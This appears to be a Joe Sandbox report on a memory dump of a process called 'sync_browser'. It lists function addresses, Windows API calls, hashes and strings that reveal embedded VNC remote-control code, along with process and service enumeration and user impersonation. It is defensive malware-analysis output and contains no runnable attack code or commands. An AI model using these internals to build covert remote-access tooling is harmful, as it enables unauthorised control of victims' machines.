Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
API String ID: 1881659197-3751679782
Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
Instruction ID: 69a59a6515a55ec1da01591eeca2e238f830dac3b274aef8c34d5bd9c8edb72a
Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
Instruction Fuzzy Hash: 77414033A28B4296EA61DF19A814179A3A8FF68790F441235F95E877A4DF3CE40DC700

Function 00007FF67E829EF0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessWindowStation.USER32 ref: 00007FF67E829F30
GetUserObjectInformationA.USER32 ref: 00007FF67E829F5E
GetLastError.KERNEL32 ref: 00007FF67E829F64
SetLastError.KERNEL32 ref: 00007FF67E829F6C
RevertToSelf.ADVAPI32 ref: 00007FF67E829F79
GetUserNameA.ADVAPI32 ref: 00007FF67E82A008
GetLastError.KERNEL32 ref: 00007FF67E82A012
GetLastError.KERNEL32 ref: 00007FF67E82A044

Strings

vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF67E829FB7
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF67E82A06F
vncservice.cpp : getusername error %d, xrefs: 00007FF67E82A04A
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF67E82A094
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF67E829F7F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF67E82A01F
vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF67E829F3B

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
API String ID: 3635673080-2232443292
Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
Instruction ID: a59f351d84fac19607327a9875d82f6057fef5612179749a15d36282debd4e23
Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
Instruction Fuzzy Hash: EB413027F2C94392EB40CB69F8442B9A3A5AFB4748F944432F65DC6565EE3CE44DC740

Function 00007FF67E82D890 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E82D90A
LeaveCriticalSection.KERNEL32 ref: 00007FF67E82D97B

Strings

vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error, xrefs: 00007FF67E82D958
vsocket.cpp : zero bytes read1, xrefs: 00007FF67E82D9D9
vsocket.cpp : zero bytes read2, xrefs: 00007FF67E82DAC7
vsocket.cpp : socket error 1: %d, xrefs: 00007FF67E82DA00

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error$vsocket.cpp : socket error 1: %d$vsocket.cpp : zero bytes read1$vsocket.cpp : zero bytes read2
API String ID: 3168844106-4245644328
Opcode ID: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
Instruction ID: 5ea7f6fb1837238b6ce0a0b76bec16731b8b2ab7e4cd8ee1c0094accad7caf21
Opcode Fuzzy Hash: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
Instruction Fuzzy Hash: 2F618223A2CA8286E764CB29A4447BAA7A5FB64754F540231FE5ED36E4DF3CE44DC700

Function 00007FF67E7C9D00 Relevance: 15.2, APIs: 10, Instructions: 209
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerA.ADVAPI32 ref: 00007FF67E7C9DBB
EnumServicesStatusA.ADVAPI32 ref: 00007FF67E7C9E1D
GetLastError.KERNEL32 ref: 00007FF67E7C9E2B
EnumServicesStatusA.ADVAPI32 ref: 00007FF67E7C9E85
OpenServiceA.ADVAPI32 ref: 00007FF67E7C9EB9
QueryServiceConfigA.ADVAPI32 ref: 00007FF67E7C9ED7
GetLastError.KERNEL32 ref: 00007FF67E7C9EE5
QueryServiceConfigA.ADVAPI32 ref: 00007FF67E7C9F16
CloseServiceHandle.ADVAPI32 ref: 00007FF67E7C9FCA
CloseServiceHandle.ADVAPI32 ref: 00007FF67E7C9FF0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
String ID:
API String ID: 3151975580-0
Opcode ID: a208b4aa3cfba9d326f69aebc0107f6b12e7bbd25a632013c5e0262ab2b99495
Instruction ID: 9204c94d6ee992de4dc38582b4535e0345a7216e2c12e7b09ee060db94035757
Opcode Fuzzy Hash: a208b4aa3cfba9d326f69aebc0107f6b12e7bbd25a632013c5e0262ab2b99495
Instruction Fuzzy Hash: 26918123B28A4189FB50DBA5D4046AD73B9BB587A8F404635EE5D97BE8EF3CD509C300

Function 00007FF67E7D0270 Relevance: 4.5, APIs: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

CreateRectRgn.GDI32 ref: 00007FF67E7D029D
CreateRectRgn.GDI32 ref: 00007FF67E7D02C1
CreateRectRgn.GDI32 ref: 00007FF67E7D02E5

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateRect$malloc
String ID:
API String ID: 1122183891-0
Opcode ID: 7ad3b45b6bc1a8438e929e5e1f418eabd285e39fca28ed775e144a5386d0bc8b
Instruction ID: e2df4a96ef99a1486f796f1a5b613c7da63c62cd9f131befd6d858b5d103089e
Opcode Fuzzy Hash: 7ad3b45b6bc1a8438e929e5e1f418eabd285e39fca28ed775e144a5386d0bc8b
Instruction Fuzzy Hash: 3C018C33F69B1286EB14DFB8B455A29B3A9EBA87047148035EE5D83B45EE3CD068C344

Function 00007FF67E7E8590 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 165
windowsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32 ref: 00007FF67E7E85FB
WaitForSingleObject.KERNEL32 ref: 00007FF67E7E8608
free.LIBCMT ref: 00007FF67E7E8651
SendMessageA.USER32 ref: 00007FF67E7E8751
free.LIBCMT ref: 00007FF67E7E8763
free.LIBCMT ref: 00007FF67E7E8774
FreeLibrary.KERNEL32 ref: 00007FF67E7E87B5
DeleteObject.GDI32 ref: 00007FF67E7E880A
free.LIBCMT ref: 00007FF67E7E8817
DeleteObject.GDI32 ref: 00007FF67E7E8832
free.LIBCMT ref: 00007FF67E7E883F
DeleteObject.GDI32 ref: 00007FF67E7E884B
free.LIBCMT ref: 00007FF67E7E8858
DeleteObject.GDI32 ref: 00007FF67E7E8864
free.LIBCMT ref: 00007FF67E7E8871

Strings

vncclient.cpp : ~vncClient() executing..., xrefs: 00007FF67E7E85BA
vncclient.cpp : deleting socket, xrefs: 00007FF67E7E8666

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
API String ID: 2172171234-2418058073
Opcode ID: 657a674c7d031777eac06996d4ae44a415d9bc6247f736f56e514ef20f35599a
Instruction ID: 6057da59267b3dfb27fef48c4ba8fa2f7ff374bce60a5281266df6e15d19bd9e
Opcode Fuzzy Hash: 657a674c7d031777eac06996d4ae44a415d9bc6247f736f56e514ef20f35599a
Instruction Fuzzy Hash: 44812737A29A8285FB50DFA5D8543E96364FFA4F84F080231EA5D8BA99CF3D9449C310

Function 00007FF67E812FF0 Relevance: 27.2, APIs: 18, Instructions: 183
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67E877978: malloc.LIBCMT ref: 00007FF67E877992

std::exception::exception.LIBCMT ref: 00007FF67E81303E
GetWindowLongPtrA.USER32 ref: 00007FF67E8130A7
GetDlgItem.USER32 ref: 00007FF67E8130F5
SendMessageA.USER32 ref: 00007FF67E81310C
SendMessageA.USER32 ref: 00007FF67E813127
EndDialog.USER32 ref: 00007FF67E813268

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
String ID:
API String ID: 1935883720-0
Opcode ID: b06cfa2c7c9d91227a6909707f994effb4396744763fd6e6bbb979b6844d4978
Instruction ID: 2aec46cb85b79b4f1d276f6c3d55bb5b5df6b7e1bb1dacffca269dad265b5957
Opcode Fuzzy Hash: b06cfa2c7c9d91227a6909707f994effb4396744763fd6e6bbb979b6844d4978
Instruction Fuzzy Hash: 7061B622B18A42C2FB109B6AE44437EA3A1EB99F95F554135FE5E87B94DF3CD449C300

Function 00007FF67E8575C0 Relevance: 25.7, APIs: 17, Instructions: 151
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E8575D9
ReleaseSemaphore.KERNEL32 ref: 00007FF67E857625
GetLastError.KERNEL32 ref: 00007FF67E85764E
LeaveCriticalSection.KERNEL32 ref: 00007FF67E857659
TlsAlloc.KERNEL32 ref: 00007FF67E8576A4
GetLastError.KERNEL32 ref: 00007FF67E8576B5
InitializeCriticalSection.KERNEL32 ref: 00007FF67E8576F0
GetCurrentProcess.KERNEL32 ref: 00007FF67E85772F
GetCurrentThread.KERNEL32 ref: 00007FF67E857738
GetCurrentProcess.KERNEL32 ref: 00007FF67E857741
DuplicateHandle.KERNELBASE ref: 00007FF67E85776C
GetLastError.KERNEL32 ref: 00007FF67E857780
GetCurrentThreadId.KERNEL32 ref: 00007FF67E85779C
TlsSetValue.KERNEL32 ref: 00007FF67E8577AE
GetLastError.KERNEL32 ref: 00007FF67E8577B8

Part of subcall function 00007FF67E882950: RaiseException.KERNEL32 ref: 00007FF67E8829CB

SetThreadPriority.KERNELBASE ref: 00007FF67E8577DA
GetLastError.KERNEL32 ref: 00007FF67E8577E4

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
String ID:
API String ID: 772457954-0
Opcode ID: e985c1ffb6018769c2b4a3bbbdc3cfbe5cf815ae3250197a8d1e99eeffc1a444
Instruction ID: 504b908890730d54473aea5a96c55495f48179c50f41cbdf969a6cee31c18783
Opcode Fuzzy Hash: e985c1ffb6018769c2b4a3bbbdc3cfbe5cf815ae3250197a8d1e99eeffc1a444
Instruction Fuzzy Hash: 09617D37E2970286EB509F69A844279B3A4FB64B84F104535FA4E877A5DF3CE58EC700

Function 00007FF67E7DF940 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.LIBCMT ref: 00007FF67E7DF9C7
EnterCriticalSection.KERNEL32 ref: 00007FF67E7DFA75
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7DFA9E
SleepEx.KERNELBASE ref: 00007FF67E7DFAF2
swscanf.LIBCMT ref: 00007FF67E7DFB87

Strings

true, xrefs: 00007FF67E7DFBB0
RFB %03d.%03d, xrefs: 00007FF67E7DF9BB, 00007FF67E7DFB7B
vncclient.cpp : m_ms_logon set to %s, xrefs: 00007FF67E7DFBC4
REP, xrefs: 00007FF67E7DFB2F
i, xrefs: 00007FF67E7DFA6A
0.0.0.0, xrefs: 00007FF67E7DF999
RFB, xrefs: 00007FF67E7DFB56
false, xrefs: 00007FF67E7DFBB7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
API String ID: 958158500-3765181313
Opcode ID: 17b903c078d06ad7cc3db47b723f34c3a7649c56c41da682e2bb553595e5fa97
Instruction ID: 08c4362782cf17ef41713aee4c6fc4da7449cb647f2c26455980d42990df6827
Opcode Fuzzy Hash: 17b903c078d06ad7cc3db47b723f34c3a7649c56c41da682e2bb553595e5fa97
Instruction Fuzzy Hash: 2891C127628B8286EB64CF25E4487AA77A5FB94B88F540132EA4D87798CF3CD44DC700

Function 00007FF67E829D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67E829BC0: LoadLibraryA.KERNEL32 ref: 00007FF67E829C03
Part of subcall function 00007FF67E829BC0: GetProcAddress.KERNEL32 ref: 00007FF67E829C1B
Part of subcall function 00007FF67E829BC0: GetProcAddress.KERNEL32 ref: 00007FF67E829C2E
Part of subcall function 00007FF67E829BC0: GetSystemMetrics.USER32 ref: 00007FF67E829C4E
Part of subcall function 00007FF67E829BC0: GetCurrentProcessId.KERNEL32 ref: 00007FF67E829C61
Part of subcall function 00007FF67E829BC0: ProcessIdToSessionId.KERNEL32 ref: 00007FF67E829C76
Part of subcall function 00007FF67E829BC0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF67E829C85
Part of subcall function 00007FF67E829BC0: Process32First.KERNEL32 ref: 00007FF67E829CA4
Part of subcall function 00007FF67E829BC0: CloseHandle.KERNEL32 ref: 00007FF67E829CB1
Part of subcall function 00007FF67E829BC0: FreeLibrary.KERNEL32 ref: 00007FF67E829CBF

OpenProcess.KERNEL32 ref: 00007FF67E829DC0
OpenProcessToken.ADVAPI32 ref: 00007FF67E829DD6
CloseHandle.KERNEL32 ref: 00007FF67E829EBA

Strings

?, xrefs: 00007FF67E829E76

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
String ID: ?
API String ID: 2900023865-1684325040
Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
Instruction ID: c6694f7ecbb142da473066816dc0dc101d65a0d0f682269ee38bd5aba97ca261
Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
Instruction Fuzzy Hash: 53311C32A1DB8285E7608F25F84436AB3A8FBA9784F504135EACD87B59DF3DD059CB01

Function 00007FF67E7E80DA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67E7D0270: CreateRectRgn.GDI32 ref: 00007FF67E7D029D
Part of subcall function 00007FF67E7D0270: CreateRectRgn.GDI32 ref: 00007FF67E7D02C1
Part of subcall function 00007FF67E7D0270: CreateRectRgn.GDI32 ref: 00007FF67E7D02E5

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

CreateRectRgn.GDI32 ref: 00007FF67E7E81F8
LoadLibraryA.KERNEL32 ref: 00007FF67E7E8235
GetProcAddress.KERNEL32 ref: 00007FF67E7E8251

Strings

vncclient.cpp : vncClient() executing..., xrefs: 00007FF67E7E8277
USER32, xrefs: 00007FF67E7E822E
SendInput, xrefs: 00007FF67E7E8247
vncclient.cpp : TEST 4, xrefs: 00007FF67E7E82DF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
